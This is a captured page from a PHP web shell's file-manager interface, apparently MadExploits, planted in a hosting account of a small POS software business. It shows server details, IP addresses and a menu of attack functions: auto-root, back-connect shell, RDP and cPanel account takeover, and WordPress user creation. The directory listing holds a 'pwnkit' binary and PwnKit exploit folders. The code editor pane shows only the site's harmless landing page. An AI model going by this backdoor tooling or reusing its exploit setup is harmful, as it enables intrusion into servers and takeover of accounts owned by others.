Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.116.24.111
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
varifktc /
.trash /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
.trash_restore
465
B
-rw-r--r--
POS.zip
92.4
MB
-rw-r--r--
development-page.zip
1.9
MB
-rw-r--r--
index.php
2.28
KB
-rw-r--r--
pos_software_web_banner.png
1.64
MB
-rw-r--r--
pos_software_web_banner_mobile...
270.72
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
wordpress-6.6.2.zip
24.93
MB
-rw-r--r--
wp-user.php
61.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<!DOCTYPE html> <html> <head> <title>Cash Counter</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css"/> <style type="text/css"> body { background: url('pos_software_web_banner.png') no-repeat center center fixed; background-size: cover; height: 100vh; margin: 0; } #footer-div { position: fixed; /* Fix the div to the viewport */ bottom: 0; /* Position it at the bottom */ left: 50px; right: 50px; /* Stretch it horizontally across the viewport */ text-align: center; } .btn-red{ background-color: #DD0505; color:#fff; } .btn-red:hover{ background-color: #DD0505; color:#fff; } /* Media query for smaller screens (e.g., mobile devices) */ @media only screen and (max-width: 768px) { body { background: url('pos_software_web_banner_mobile_version_1.png') no-repeat center center fixed; background-size: cover; } #footer-div { text-align: center; left: 20px; right: 20px; /* Stretch it horizontally across the viewport */ } .btn { font-size: 1rem; /* Adjust the font size for smaller screens */ margin-top: 20px; width: 100%; } } </style> </head> <body> <div class="row" id="footer-div" style="margin-bottom: 30px"> <div class="col-md-4 col-sm-12"> <a class="btn btn-red rounded-pill btn-lg" href="https://www.facebook.com/bd.variation"> <i class="fa-brands fa-facebook"></i> facebook.com/bd.variation</a> </div> <div class="col-md-4 col-sm-12"> <a class="btn btn-red rounded-pill btn-lg" href="tel:+8801332527540"> <i class="fa-solid fa-headset"></i> +880 133 2527 540</a> </div> <div class="col-md-4 col-sm-12"> <a class="btn btn-red rounded-pill btn-lg" href="https://variationbd.com/"> <i class="fa-solid fa-globe"></i> variationbd.com</a> </div> </div> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"></script> </body> </html>
Close